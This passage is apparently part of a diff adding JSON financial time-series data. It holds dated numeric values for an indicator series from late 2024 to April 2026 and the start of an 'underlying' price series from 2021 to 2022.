"2024-10-31", + 44.74667963427891 + ], + [ + "2024-11-01", + 48.38078637367082 + ], + [ + "2024-11-04", + 47.058685719697905 + ], + [ + "2024-11-05", + 53.08672278290406 + ], + [ + "2024-11-06", + 62.897561462035426 + ], + [ + "2024-11-07", + 67.2842357491133 + ], + [ + "2024-11-08", + 67.59526243294756 + ], + [ + "2024-11-11", + 67.25104922061641 + ], + [ + "2024-11-12", + 66.12665775335853 + ], + [ + "2024-11-13", + 65.29256144426608 + ], + [ + "2024-11-14", + 60.834525045791445 + ], + [ + "2024-11-15", + 48.65471184888858 + ], + [ + "2024-11-18", + 51.62378720615265 + ], + [ + "2024-11-19", + 54.452013699180945 + ], + [ + "2024-11-20", + 54.16454313153157 + ], + [ + "2024-11-21", + 55.73539291663553 + ], + [ + "2024-11-22", + 56.454604113069514 + ], + [ + "2024-11-25", + 57.19436583632151 + ], + [ + "2024-11-26", + 59.701095150765624 + ], + [ + "2024-11-27", + 54.62253537476194 + ], + [ + "2024-11-29", + 58.80145353166622 + ], + [ + "2024-12-02", + 63.3455267259903 + ], + [ + "2024-12-03", + 64.54450334591655 + ], + [ + "2024-12-04", + 68.96575839758658 + ], + [ + "2024-12-05", + 66.92618660174386 + ], + [ + "2024-12-06", + 70.00292169450461 + ], + [ + "2024-12-09", + 64.34359913768566 + ], + [ + "2024-12-10", + 62.00024849248417 + ], + [ + "2024-12-11", + 68.474467902876 + ], + [ + "2024-12-12", + 64.15505938237983 + ], + [ + "2024-12-13", + 66.81183998948804 + ], + [ + "2024-12-16", + 71.17385484777476 + ], + [ + "2024-12-17", + 68.18015097101068 + ], + [ + "2024-12-18", + 49.786720240461825 + ], + [ + "2024-12-19", + 48.123157401649074 + ], + [ + "2024-12-20", + 51.52823236587836 + ], + [ + "2024-12-23", + 55.10002956419096 + ], + [ + "2024-12-24", + 59.60506714044872 + ], + [ + "2024-12-26", + 59.279779932466184 + ], + [ + "2024-12-27", + 53.16988626902337 + ], + [ + "2024-12-30", + 47.91895778840389 + ], + [ + "2024-12-31", + 44.908914316854705 + ], + [ + "2025-01-02", + 44.22587319458414 + ], + [ + "2025-01-03", + 50.936319528440116 + ], + [ + "2025-01-06", + 55.08976097225353 + ], + [ + "2025-01-07", + 48.190163043282595 + ], + [ + "2025-01-08", + 48.25732391707763 + ], + [ + "2025-01-10", + 42.88676793553009 + ], + [ + "2025-01-13", + 41.87435056800395 + ], + [ + "2025-01-14", + 41.563179870008234 + ], + [ + "2025-01-15", + 51.046757022876356 + ], + [ + "2025-01-16", + 48.41092751826029 + ], + [ + "2025-01-17", + 54.46792914214896 + ], + [ + "2025-01-21", + 56.41513632451361 + ], + [ + "2025-01-22", + 60.413128416018544 + ], + [ + "2025-01-23", + 61.06094102225298 + ], + [ + "2025-01-24", + 58.323190029610565 + ], + [ + "2025-01-27", + 46.757186120036586 + ], + [ + "2025-01-28", + 51.82767329262237 + ], + [ + "2025-01-29", + 51.15125751096234 + ], + [ + "2025-01-30", + 52.65866885061576 + ], + [ + "2025-01-31", + 52.06628180635984 + ], + [ + "2025-02-03", + 48.813858660432885 + ], + [ + "2025-02-04", + 53.56661129567868 + ], + [ + "2025-02-05", + 55.241478607698674 + ], + [ + "2025-02-06", + 57.164078105011534 + ], + [ + "2025-02-07", + 51.38951625628233 + ], + [ + "2025-02-10", + 55.9323694312528 + ], + [ + "2025-02-11", + 54.833867163494105 + ], + [ + "2025-02-12", + 55.06772387475139 + ], + [ + "2025-02-13", + 60.47045260310869 + ], + [ + "2025-02-14", + 61.92988291071324 + ], + [ + "2025-02-18", + 62.7333005021112 + ], + [ + "2025-02-19", + 62.837185037048435 + ], + [ + "2025-02-20", + 60.08431052848548 + ], + [ + "2025-02-21", + 48.86089022568415 + ], + [ + "2025-02-24", + 43.93802067223063 + ], + [ + "2025-02-25", + 39.42603073480413 + ], + [ + "2025-02-26", + 40.668159483272014 + ], + [ + "2025-02-27", + 32.41779725624686 + ], + [ + "2025-02-28", + 39.700813594418705 + ], + [ + "2025-03-03", + 34.12603356600708 + ], + [ + "2025-03-04", + 33.443835018499044 + ], + [ + "2025-03-05", + 39.09106665697801 + ], + [ + "2025-03-06", + 32.70285881902332 + ], + [ + "2025-03-07", + 35.647000142345135 + ], + [ + "2025-03-10", + 28.514553956798153 + ], + [ + "2025-03-11", + 28.154885458291446 + ], + [ + "2025-03-12", + 32.473419505626936 + ], + [ + "2025-03-13", + 29.40368242326025 + ], + [ + "2025-03-14", + 37.762913159616666 + ], + [ + "2025-03-17", + 39.86945683476126 + ], + [ + "2025-03-18", + 36.36195610893946 + ], + [ + "2025-03-19", + 40.697003921469694 + ], + [ + "2025-03-20", + 39.94480461064739 + ], + [ + "2025-03-21", + 41.08156257976712 + ], + [ + "2025-03-24", + 48.141481854130106 + ], + [ + "2025-03-25", + 49.86091209949145 + ], + [ + "2025-03-26", + 44.68652844331384 + ], + [ + "2025-03-27", + 43.21835882615324 + ], + [ + "2025-03-28", + 37.17540220890611 + ], + [ + "2025-03-31", + 37.166564083259765 + ], + [ + "2025-04-01", + 40.06334293224376 + ], + [ + "2025-04-02", + 42.661542451990684 + ], + [ + "2025-04-03", + 31.72043230393581 + ], + [ + "2025-04-04", + 24.33892172547931 + ], + [ + "2025-04-07", + 25.02365336999236 + ], + [ + "2025-04-08", + 23.32329906457055 + ], + [ + "2025-04-09", + 48.15487870264552 + ], + [ + "2025-04-10", + 42.29995599072652 + ], + [ + "2025-04-11", + 45.271924890500216 + ], + [ + "2025-04-14", + 46.38624557344851 + ], + [ + "2025-04-15", + 46.58019952071793 + ], + [ + "2025-04-16", + 42.13512248389879 + ], + [ + "2025-04-17", + 42.1100512233578 + ], + [ + "2025-04-21", + 38.70329188586758 + ], + [ + "2025-04-22", + 43.77156979286994 + ], + [ + "2025-04-23", + 47.88556492866938 + ], + [ + "2025-04-24", + 52.622280074154396 + ], + [ + "2025-04-25", + 54.43889509689157 + ], + [ + "2025-04-28", + 54.37425884346815 + ], + [ + "2025-04-29", + 55.556395559278876 + ], + [ + "2025-04-30", + 55.52659463160545 + ], + [ + "2025-05-01", + 58.03512761444411 + ], + [ + "2025-05-02", + 60.77824610178827 + ], + [ + "2025-05-05", + 59.09110318067679 + ], + [ + "2025-05-06", + 56.46035438488501 + ], + [ + "2025-05-07", + 57.316053731885695 + ], + [ + "2025-05-08", + 59.57507788292309 + ], + [ + "2025-05-09", + 59.358129357306126 + ], + [ + "2025-05-12", + 67.32029332069007 + ], + [ + "2025-05-13", + 69.80091235911256 + ], + [ + "2025-05-14", + 70.7553217012491 + ], + [ + "2025-05-15", + 70.93776439481576 + ], + [ + "2025-05-16", + 71.69193201258715 + ], + [ + "2025-05-19", + 71.86586103929517 + ], + [ + "2025-05-20", + 70.24823874054846 + ], + [ + "2025-05-21", + 63.819907575071475 + ], + [ + "2025-05-22", + 64.2872338516281 + ], + [ + "2025-05-23", + 60.139411056278185 + ], + [ + "2025-05-27", + 66.07242949566192 + ], + [ + "2025-05-28", + 64.09142246851073 + ], + [ + "2025-05-29", + 64.5961945690775 + ], + [ + "2025-05-30", + 63.81954967558235 + ], + [ + "2025-06-02", + 66.0195006098895 + ], + [ + "2025-06-03", + 68.10300195643605 + ], + [ + "2025-06-04", + 68.84251272752944 + ], + [ + "2025-06-05", + 64.4836594175183 + ], + [ + "2025-06-06", + 67.35290865309757 + ], + [ + "2025-06-09", + 67.77917357506172 + ], + [ + "2025-06-10", + 69.69651027056597 + ], + [ + "2025-06-11", + 67.47883502855896 + ], + [ + "2025-06-12", + 68.23470719884438 + ], + [ + "2025-06-13", + 60.16329782435034 + ], + [ + "2025-06-16", + 65.0360829738859 + ], + [ + "2025-06-17", + 59.4681357181466 + ], + [ + "2025-06-18", + 59.373472471787174 + ], + [ + "2025-06-20", + 57.02971061116785 + ], + [ + "2025-06-23", + 61.16981578001135 + ], + [ + "2025-06-24", + 66.40693535638536 + ], + [ + "2025-06-25", + 67.21514287686017 + ], + [ + "2025-06-26", + 70.05980879469324 + ], + [ + "2025-06-27", + 71.05922016451557 + ], + [ + "2025-06-30", + 72.90805200465547 + ], + [ + "2025-07-01", + 66.88105223845315 + ], + [ + "2025-07-02", + 69.13259569694262 + ], + [ + "2025-07-03", + 72.04422604843809 + ], + [ + "2025-07-07", + 66.79862134293784 + ], + [ + "2025-07-08", + 66.99011640036096 + ], + [ + "2025-07-09", + 69.38842626616517 + ], + [ + "2025-07-10", + 68.29515353608656 + ], + [ + "2025-07-11", + 66.53110380359769 + ], + [ + "2025-07-14", + 67.96403804061478 + ], + [ + "2025-07-15", + 68.33439269133859 + ], + [ + "2025-07-16", + 68.769088901287 + ], + [ + "2025-07-17", + 72.03945238895031 + ], + [ + "2025-07-18", + 71.07976220561991 + ], + [ + "2025-07-21", + 73.15531307866802 + ], + [ + "2025-07-22", + 67.89016259215938 + ], + [ + "2025-07-23", + 69.9332951002472 + ], + [ + "2025-07-24", + 70.86894977139642 + ], + [ + "2025-07-25", + 71.93496894638079 + ], + [ + "2025-07-28", + 73.30424334080547 + ], + [ + "2025-07-29", + 71.43813140237795 + ], + [ + "2025-07-30", + 72.09868649721457 + ], + [ + "2025-07-31", + 65.62486271169087 + ], + [ + "2025-08-01", + 48.340611692568075 + ], + [ + "2025-08-04", + 59.01509696371282 + ], + [ + "2025-08-05", + 54.47248056102701 + ], + [ + "2025-08-06", + 60.499769725230294 + ], + [ + "2025-08-07", + 61.97611634443008 + ], + [ + "2025-08-08", + 65.78501670516852 + ], + [ + "2025-08-11", + 63.58878525203717 + ], + [ + "2025-08-12", + 68.40033214079655 + ], + [ + "2025-08-13", + 68.58047159485696 + ], + [ + "2025-08-14", + 67.93343990066046 + ], + [ + "2025-08-15", + 64.23535571790643 + ], + [ + "2025-08-18", + 63.89742524404208 + ], + [ + "2025-08-19", + 53.56742430106161 + ], + [ + "2025-08-20", + 49.82298818397207 + ], + [ + "2025-08-21", + 47.07602812033418 + ], + [ + "2025-08-22", + 55.78378529786733 + ], + [ + "2025-08-25", + 53.96819123722855 + ], + [ + "2025-08-26", + 56.10355683505327 + ], + [ + "2025-08-27", + 56.930524016981394 + ], + [ + "2025-08-28", + 60.22245532172332 + ], + [ + "2025-08-29", + 52.22382935378784 + ], + [ + "2025-09-02", + 47.37498104613238 + ], + [ + "2025-09-03", + 51.85647253373401 + ], + [ + "2025-09-04", + 56.48407288325211 + ], + [ + "2025-09-05", + 57.19681021988155 + ], + [ + "2025-09-08", + 59.60874378995471 + ], + [ + "2025-09-09", + 60.990321632701374 + ], + [ + "2025-09-10", + 61.15612321569367 + ], + [ + "2025-09-11", + 64.08039257415743 + ], + [ + "2025-09-12", + 66.17370392621118 + ], + [ + "2025-09-15", + 69.85490057570362 + ], + [ + "2025-09-16", + 69.04885340566798 + ], + [ + "2025-09-17", + 67.08171613281601 + ], + [ + "2025-09-18", + 71.08188920009124 + ], + [ + "2025-09-19", + 73.69001828711816 + ], + [ + "2025-09-22", + 75.76270859309946 + ], + [ + "2025-09-23", + 69.14207926251754 + ], + [ + "2025-09-24", + 65.8867899189338 + ], + [ + "2025-09-25", + 62.03741791834571 + ], + [ + "2025-09-26", + 64.17727929177705 + ], + [ + "2025-09-29", + 66.47906845247186 + ], + [ + "2025-09-30", + 67.80295329588398 + ], + [ + "2025-10-01", + 70.04055813621473 + ], + [ + "2025-10-02", + 71.85452145621538 + ], + [ + "2025-10-03", + 67.33981185132501 + ], + [ + "2025-10-06", + 70.84446341563677 + ], + [ + "2025-10-07", + 65.4977188100716 + ], + [ + "2025-10-08", + 70.66174261235975 + ], + [ + "2025-10-09", + 69.46614110148928 + ], + [ + "2025-10-10", + 45.64021594402842 + ], + [ + "2025-10-13", + 55.36826648422727 + ], + [ + "2025-10-14", + 52.14686897948328 + ], + [ + "2025-10-15", + 55.10703062693981 + ], + [ + "2025-10-16", + 53.233059658216966 + ], + [ + "2025-10-17", + 56.07517307614311 + ], + [ + "2025-10-20", + 61.00457295561157 + ], + [ + "2025-10-21", + 60.849998879932414 + ], + [ + "2025-10-22", + 55.293982007228834 + ], + [ + "2025-10-23", + 58.79533806587004 + ], + [ + "2025-10-24", + 62.812963901358515 + ], + [ + "2025-10-27", + 68.40513419263316 + ], + [ + "2025-10-28", + 70.50443759714905 + ], + [ + "2025-10-29", + 71.69936926757204 + ], + [ + "2025-10-30", + 62.41263245911268 + ], + [ + "2025-10-31", + 63.97397515175735 + ], + [ + "2025-11-03", + 65.51160170582435 + ], + [ + "2025-11-04", + 54.778984687204265 + ], + [ + "2025-11-05", + 57.15350185254201 + ], + [ + "2025-11-06", + 49.147110598407146 + ], + [ + "2025-11-07", + 47.944714951843125 + ], + [ + "2025-11-10", + 56.04015790372853 + ], + [ + "2025-11-11", + 54.908559221999525 + ], + [ + "2025-11-12", + 54.55833581526935 + ], + [ + "2025-11-13", + 46.32440428132675 + ], + [ + "2025-11-14", + 46.63901069627934 + ], + [ + "2025-11-17", + 43.532578008492465 + ], + [ + "2025-11-18", + 39.52520991138775 + ], + [ + "2025-11-19", + 42.29596105069241 + ], + [ + "2025-11-20", + 35.34062701753068 + ], + [ + "2025-11-21", + 38.70421946281614 + ], + [ + "2025-11-24", + 48.58282191433237 + ], + [ + "2025-11-25", + 50.6979815198184 + ], + [ + "2025-11-26", + 53.659037056724706 + ], + [ + "2025-11-28", + 56.27676913343135 + ], + [ + "2025-12-01", + 54.88228149838167 + ], + [ + "2025-12-02", + 57.51490457518112 + ], + [ + "2025-12-03", + 58.338793277700546 + ], + [ + "2025-12-04", + 57.87760863041858 + ], + [ + "2025-12-05", + 59.39166764875348 + ], + [ + "2025-12-08", + 58.32500588123713 + ], + [ + "2025-12-09", + 58.835851282130825 + ], + [ + "2025-12-10", + 60.566619729744126 + ], + [ + "2025-12-11", + 58.46741072546566 + ], + [ + "2025-12-12", + 47.927424087620196 + ], + [ + "2025-12-15", + 45.645388312263734 + ], + [ + "2025-12-16", + 46.718712313938745 + ], + [ + "2025-12-17", + 38.95492024921719 + ], + [ + "2025-12-18", + 46.32459717260156 + ], + [ + "2025-12-19", + 52.01792957164541 + ], + [ + "2025-12-22", + 53.97632076831719 + ], + [ + "2025-12-23", + 55.88012968327496 + ], + [ + "2025-12-24", + 57.08011367869064 + ], + [ + "2025-12-26", + 57.043366965281 + ], + [ + "2025-12-29", + 54.207953206122276 + ], + [ + "2025-12-30", + 52.858725354108245 + ], + [ + "2025-12-31", + 48.259534402169606 + ], + [ + "2026-01-02", + 47.23093518832165 + ], + [ + "2026-01-05", + 51.762234421095435 + ], + [ + "2026-01-06", + 56.27112834701174 + ], + [ + "2026-01-07", + 56.752218554566454 + ], + [ + "2026-01-08", + 53.03476804463294 + ], + [ + "2026-01-09", + 58.171356723064214 + ], + [ + "2026-01-12", + 58.58183441197129 + ], + [ + "2026-01-13", + 57.4951320933574 + ], + [ + "2026-01-14", + 50.27091765635473 + ], + [ + "2026-01-15", + 52.41717189825848 + ], + [ + "2026-01-16", + 51.855166872142476 + ], + [ + "2026-01-20", + 40.101338146609166 + ], + [ + "2026-01-21", + 48.00503797063075 + ], + [ + "2026-01-22", + 51.74244022222434 + ], + [ + "2026-01-23", + 53.32321102231923 + ], + [ + "2026-01-26", + 55.516943519671635 + ], + [ + "2026-01-27", + 59.73421059705973 + ], + [ + "2026-01-28", + 61.194611987426235 + ], + [ + "2026-01-29", + 57.146890219924565 + ], + [ + "2026-01-30", + 50.03708543681018 + ], + [ + "2026-02-02", + 53.55208203039163 + ], + [ + "2026-02-03", + 45.744041529625555 + ], + [ + "2026-02-04", + 38.90501445378359 + ], + [ + "2026-02-05", + 34.41824812746897 + ], + [ + "2026-02-06", + 44.41020883370859 + ], + [ + "2026-02-09", + 47.59226050349218 + ], + [ + "2026-02-10", + 45.86671730393649 + ], + [ + "2026-02-11", + 47.05627408716366 + ], + [ + "2026-02-12", + 39.88024403635974 + ], + [ + "2026-02-13", + 40.87691119418792 + ], + [ + "2026-02-17", + 40.52642540467996 + ], + [ + "2026-02-18", + 44.253930790987184 + ], + [ + "2026-02-19", + 42.762574443143784 + ], + [ + "2026-02-20", + 47.175308112115886 + ], + [ + "2026-02-23", + 42.3076257518347 + ], + [ + "2026-02-24", + 47.40917120696723 + ], + [ + "2026-02-25", + 53.45407788452716 + ], + [ + "2026-02-26", + 48.39510956727154 + ], + [ + "2026-02-27", + 47.13593167230856 + ], + [ + "2026-03-02", + 47.73672697709689 + ], + [ + "2026-03-03", + 43.413082513188364 + ], + [ + "2026-03-04", + 50.248685412076135 + ], + [ + "2026-03-05", + 48.97034188998492 + ], + [ + "2026-03-06", + 43.093125781926695 + ], + [ + "2026-03-09", + 48.871743190578556 + ], + [ + "2026-03-10", + 48.87873810965169 + ], + [ + "2026-03-11", + 48.821324909935186 + ], + [ + "2026-03-12", + 41.90931224473044 + ], + [ + "2026-03-13", + 39.84724963770871 + ], + [ + "2026-03-16", + 45.300153835914074 + ], + [ + "2026-03-17", + 47.552715000516 + ], + [ + "2026-03-18", + 42.18317713923117 + ], + [ + "2026-03-19", + 41.06679191351105 + ], + [ + "2026-03-20", + 35.21569411106644 + ], + [ + "2026-03-23", + 40.757175855514426 + ], + [ + "2026-03-24", + 38.614315346979105 + ], + [ + "2026-03-25", + 41.76403483407432 + ], + [ + "2026-03-26", + 34.74864717524535 + ], + [ + "2026-03-27", + 30.360436752089555 + ], + [ + "2026-03-30", + 28.85514523371232 + ], + [ + "2026-03-31", + 42.378276590573975 + ], + [ + "2026-04-01", + 46.50901693951276 + ], + [ + "2026-04-02", + 46.89426605454897 + ], + [ + "2026-04-06", + 48.97358982228716 + ], + [ + "2026-04-07", + 49.0285590081952 + ], + [ + "2026-04-08", + 58.408137269784625 + ], + [ + "2026-04-09", + 60.25350589445984 + ], + [ + "2026-04-10", + 60.656994053677586 + ], + [ + "2026-04-13", + 63.521111039320864 + ], + [ + "2026-04-14", + 67.97449735409536 + ], + [ + "2026-04-15", + 70.9705737683581 + ], + [ + "2026-04-16", + 71.95622612866393 + ], + [ + "2026-04-17", + 74.50130606907018 + ], + [ + "2026-04-20", + 72.75337133796924 + ], + [ + "2026-04-21", + 70.62253156049925 + ], + [ + "2026-04-22", + 74.18999633329594 + ], + [ + "2026-04-23", + 71.01117668467205 + ] + ], + "underlying": [ + [ + "2021-04-26", + 26.557361602783203 + ], + [ + "2021-04-27", + 26.208740234375 + ], + [ + "2021-04-28", + 25.93891143798828 + ], + [ + "2021-04-29", + 26.199188232421875 + ], + [ + "2021-04-30", + 25.707298278808594 + ], + [ + "2021-05-03", + 25.28704071044922 + ], + [ + "2021-05-04", + 23.954635620117188 + ], + [ + "2021-05-05", + 23.675264358520508 + ], + [ + "2021-05-06", + 24.193416595458984 + ], + [ + "2021-05-07", + 24.785602569580078 + ], + [ + "2021-05-10", + 22.923093795776367 + ], + [ + "2021-05-11", + 22.808481216430664 + ], + [ + "2021-05-12", + 21.07253074645996 + ], + [ + "2021-05-13", + 21.516666412353516 + ], + [ + "2021-05-14", + 22.91592788696289 + ], + [ + "2021-05-17", + 22.529104232788086 + ], + [ + "2021-05-18", + 22.056316375732422 + ], + [ + "2021-05-19", + 22.137500762939453 + ], + [ + "2021-05-20", + 23.417375564575195 + ], + [ + "2021-05-21", + 23.030542373657227 + ], + [ + "2021-05-24", + 24.18386459350586 + ], + [ + "2021-05-25", + 24.30086898803711 + ], + [ + "2021-05-26", + 24.54681396484375 + ], + [ + "2021-05-27", + 24.260272979736328 + ], + [ + "2021-05-28", + 24.49666976928711 + ], + [ + "2021-06-01", + 24.25788688659668 + ], + [ + "2021-06-02", + 24.38444709777832 + ], + [ + "2021-06-03", + 23.617956161499023 + ], + [ + "2021-06-04", + 24.82857894897461 + ], + [ + "2021-06-07", + 25.04825782775879 + ], + [ + "2021-06-08", + 25.07691192626953 + ], + [ + "2021-06-09", + 25.105566024780273 + ], + [ + "2021-06-10", + 25.87445068359375 + ], + [ + "2021-06-11", + 26.079797744750977 + ], + [ + "2021-06-14", + 26.81047248840332 + ], + [ + "2021-06-15", + 26.31380271911621 + ], + [ + "2021-06-16", + 26.03203773498535 + ], + [ + "2021-06-17", + 27.00388526916504 + ], + [ + "2021-06-18", + 26.359169006347656 + ], + [ + "2021-06-21", + 26.841508865356445 + ], + [ + "2021-06-22", + 27.591289520263672 + ], + [ + "2021-06-23", + 27.63904571533203 + ], + [ + "2021-06-24", + 28.147647857666016 + ], + [ + "2021-06-25", + 28.05929946899414 + ], + [ + "2021-06-28", + 29.052635192871094 + ], + [ + "2021-06-29", + 29.37976837158203 + ], + [ + "2021-06-30", + 29.25082778930664 + ], + [ + "2021-07-01", + 29.265151977539062 + ], + [ + "2021-07-02", + 30.258481979370117 + ], + [ + "2021-07-06", + 30.66441535949707 + ], + [ + "2021-07-07", + 30.86021614074707 + ], + [ + "2021-07-08", + 30.325345993041992 + ], + [ + "2021-07-09", + 30.838727951049805 + ], + [ + "2021-07-12", + 31.225557327270508 + ], + [ + "2021-07-13", + 31.20883560180664 + ], + [ + "2021-07-14", + 31.378379821777344 + ], + [ + "2021-07-15", + 30.72888946533203 + ], + [ + "2021-07-16", + 29.97433090209961 + ], + [ + "2021-07-19", + 29.255599975585938 + ], + [ + "2021-07-20", + 30.22027587890625 + ], + [ + "2021-07-21", + 30.91036033630371 + ], + [ + "2021-07-22", + 31.55984878540039 + ], + [ + "2021-07-23", + 32.608097076416016 + ], + [ + "2021-07-26", + 32.74421310424805 + ], + [ + "2021-07-27", + 31.674463272094727 + ], + [ + "2021-07-28", + 32.020694732666016 + ], + [ + "2021-07-29", + 32.17830276489258 + ], + [ + "2021-07-30", + 31.695955276489258 + ], + [ + "2021-08-02", + 31.6864013671875 + ], + [ + "2021-08-03", + 32.23799514770508 + ], + [ + "2021-08-04", + 32.397979736328125 + ], + [ + "2021-08-05", + 33.00686264038086 + ], + [ + "2021-08-06", + 32.577056884765625 + ], + [ + "2021-08-09", + 32.751373291015625 + ], + [ + "2021-08-10", + 32.261871337890625 + ], + [ + "2021-08-11", + 32.08756637573242 + ], + [ + "2021-08-12", + 32.421852111816406 + ], + [ + "2021-08-13", + 32.7465934753418 + ], + [ + "2021-08-16", + 32.80390167236328 + ], + [ + "2021-08-17", + 31.9419002532959 + ], + [ + "2021-08-18", + 31.013042449951172 + ], + [ + "2021-08-19", + 31.45478057861328 + ], + [ + "2021-08-20", + 32.42662811279297 + ], + [ + "2021-08-23", + 33.87126159667969 + ], + [ + "2021-08-24", + 34.20555877685547 + ], + [ + "2021-08-25", + 34.24375915527344 + ], + [ + "2021-08-26", + 33.66352081298828 + ], + [ + "2021-08-27", + 34.64730453491211 + ], + [ + "2021-08-30", + 35.79584884643555 + ], + [ + "2021-08-31", + 35.69554901123047 + ], + [ + "2021-09-01", + 35.891361236572266 + ], + [ + "2021-09-02", + 35.841217041015625 + ], + [ + "2021-09-03", + 36.16357421875 + ], + [ + "2021-09-07", + 36.311614990234375 + ], + [ + "2021-09-08", + 35.939117431640625 + ], + [ + "2021-09-09", + 35.5546760559082 + ], + [ + "2021-09-10", + 34.75475311279297 + ], + [ + "2021-09-13", + 34.67595672607422 + ], + [ + "2021-09-14", + 34.377479553222656 + ], + [ + "2021-09-15", + 35.139190673828125 + ], + [ + "2021-09-16", + 35.20844268798828 + ], + [ + "2021-09-17", + 33.96438980102539 + ], + [ + "2021-09-20", + 31.875041961669922 + ], + [ + "2021-09-21", + 31.915637969970703 + ], + [ + "2021-09-22", + 32.84927749633789 + ], + [ + "2021-09-23", + 33.76142501831055 + ], + [ + "2021-09-24", + 33.85693359375 + ], + [ + "2021-09-27", + 33.04029846191406 + ], + [ + "2021-09-28", + 30.284751892089844 + ], + [ + "2021-09-29", + 30.08417510986328 + ], + [ + "2021-09-30", + 29.74510955810547 + ], + [ + "2021-10-01", + 30.287137985229492 + ], + [ + "2021-10-04", + 28.424638748168945 + ], + [ + "2021-10-05", + 29.518260955810547 + ], + [ + "2021-10-06", + 30.10089111328125 + ], + [ + "2021-10-07", + 30.915136337280273 + ], + [ + "2021-10-08", + 30.439964294433594 + ], + [ + "2021-10-11", + 29.764209747314453 + ], + [ + "2021-10-12", + 29.46095085144043 + ], + [ + "2021-10-13", + 30.15103530883789 + ], + [ + "2021-10-14", + 31.815349578857422 + ], + [ + "2021-10-15", + 32.4051399230957 + ], + [ + "2021-10-18", + 33.37697982788086 + ], + [ + "2021-10-19", + 34.110042572021484 + ], + [ + "2021-10-20", + 34.002586364746094 + ], + [ + "2021-10-21", + 34.611488342285156 + ], + [ + "2021-10-22", + 33.73516082763672 + ], + [ + "2021-10-25", + 34.747589111328125 + ], + [ + "2021-10-26", + 35.07234191894531 + ], + [ + "2021-10-27", + 35.34932327270508 + ], + [ + "2021-10-28", + 36.509803771972656 + ], + [ + "2021-10-29", + 37.04945373535156 + ], + [ + "2021-11-01", + 37.41478729248047 + ], + [ + "2021-11-02", + 37.91384506225586 + ], + [ + "2021-11-03", + 39.11731719970703 + ], + [ + "2021-11-04", + 40.576271057128906 + ], + [ + "2021-11-05", + 40.72669982910156 + ], + [ + "2021-11-08", + 40.559547424316406 + ], + [ + "2021-11-09", + 39.72381591796875 + ], + [ + "2021-11-10", + 37.98310089111328 + ], + [ + "2021-11-11", + 38.291114807128906 + ], + [ + "2021-11-12", + 39.50651931762695 + ], + [ + "2021-11-15", + 39.49457931518555 + ], + [ + "2021-11-16", + 40.311222076416016 + ], + [ + "2021-11-17", + 40.358978271484375 + ], + [ + "2021-11-18", + 41.59347915649414 + ], + [ + "2021-11-19", + 42.29788589477539 + ], + [ + "2021-11-22", + 40.831756591796875 + ], + [ + "2021-11-23", + 40.27539825439453 + ], + [ + "2021-11-24", + 40.64790344238281 + ], + [ + "2021-11-26", + 38.405738830566406 + ], + [ + "2021-11-29", + 40.791175842285156 + ], + [ + "2021-11-30", + 39.038509368896484 + ], + [ + "2021-12-01", + 37.03513717651367 + ], + [ + "2021-12-02", + 37.73236846923828 + ], + [ + "2021-12-03", + 35.8364372253418 + ], + [ + "2021-12-06", + 36.674564361572266 + ], + [ + "2021-12-07", + 39.98170471191406 + ], + [ + "2021-12-08", + 40.53806686401367 + ], + [ + "2021-12-09", + 38.78778839111328 + ], + [ + "2021-12-10", + 39.988868713378906 + ], + [ + "2021-12-13", + 38.26963806152344 + ], + [ + "2021-12-14", + 37.130638122558594 + ], + [ + "2021-12-15", + 39.58770751953125 + ], + [ + "2021-12-16", + 36.56711959838867 + ], + [ + "2021-12-17", + 36.00836181640625 + ], + [ + "2021-12-20", + 34.931453704833984 + ], + [ + "2021-12-21", + 37.26674270629883 + ], + [ + "2021-12-22", + 38.596771240234375 + ], + [ + "2021-12-23", + 39.51368713378906 + ], + [ + "2021-12-27", + 41.4024543762207 + ], + [ + "2021-12-28", + 40.915340423583984 + ], + [ + "2021-12-29", + 40.85087203979492 + ], + [ + "2021-12-30", + 40.46881866455078 + ], + [ + "2021-12-31", + 39.716644287109375 + ], + [ + "2022-01-03", + 40.8628044128418 + ], + [ + "2022-01-04", + 39.27489471435547 + ], + [ + "2022-01-05", + 35.66212844848633 + ], + [ + "2022-01-06", + 35.56423568725586 + ], + [ + "2022-01-07", + 34.401363372802734 + ], + [ + "2022-01-10", + 34.52791213989258 + ], + [ + "2022-01-11", + 36.04656982421875 + ], + [ + "2022-01-12", + 36.457271575927734 + ], + [ + "2022-01-13", + 33.811561584472656 + ], + [ + "2022-01-14", + 34.32255935668945 + ], + [ + "2022-01-18", + 31.84878158569336 + ], + [ + "2022-01-19", + 30.74082374572754 + ], + [ + "2022-01-20", + 29.55168914794922 + ], + [ + "2022-01-21", + 27.063579559326172 + ], + [ + "2022-01-24", + 27.455183029174805 + ], + [ + "2022-01-25", + 25.430309295654297 + ], + [ + "2022-01-26", + 25.38255500793457 + ], + [ + "2022-01-27", + 24.62322425842285 + ], + [ + "2022-01-28", + 26.92030906677246 + ], + [ + "2022-01-31", + 29.527812957763672 + ], + [ + "2022-02-01", + 30.091341018676758 + ], + [ + "2022-02-02", + 30.802907943725586 + ], + [ + "2022-02-03", + 27.097007751464844 + ], + [ + "2022-02-04", + 28.033035278320312 + ], + [ + "2022-02-07", + 27.397878646850586 + ], + [ + "2022-02-08", + 28.329124450683594 + ], + [ + "2022-02-09", + 30.086565017700195 + ], + [ + "2022-02-10", + 28.090343475341797 + ], + [ + "2022-02-11", + 25.444637298583984 + ], + [ + "2022-02-14", + 25.51626968383789 + ], + [ + "2022-02-15", + 27.36444854736328 + ], + [ + "2022-02-16", + 27.35967254638672 + ], + [ + "2022-02-17", + 24.93364143371582 + ], + [ + "2022-02-18", + 24.088354110717773 + ], + [ + "2022-02-22", + 23.343353271484375 + ], + [ + "2022-02-23", + 21.55725860595703 + ], + [ + "2022-02-24", + 23.668094635009766 + ], + [ + "2022-02-25", + 24.790374755859375 + ], + [ + "2022-02-28", + 25.05303192138672 + ], + [ + "2022-03-01", + 23.89733123779297 + ], + [ + "2022-03-02", + 25.03870964050293 + ], + [ + "2022-03-03", + 23.992839813232422 + ], + [ + "2022-03-04", + 22.96607780456543 + ], + [ + "2022-03-07", + 20.40155601501465 + ], + [ + "2022-03-08", + 20.119792938232422 + ], + [ + "2022-03-09", + 22.273605346679688 + ], + [ + "2022-03-10", + 21.55725860595703 + ], + [ + "2022-03-11", + 20.220081329345703 + ], + [ + "2022-03-14", + 19.035720825195312 + ], + [ + "2022-03-15", + 20.797931671142578 + ], + [ + "2022-03-16", + 23.13322639465332 + ], + [ + "2022-03-17", + 23.906883239746094 + ], + [ + "2022-03-18", + 25.392105102539062 + ], + [ + "2022-03-21", + 25.210630416870117 + ], + [ + "2022-03-22", + 26.70063018798828 + ], + [ + "2022-03-23", + 25.573575973510742 + 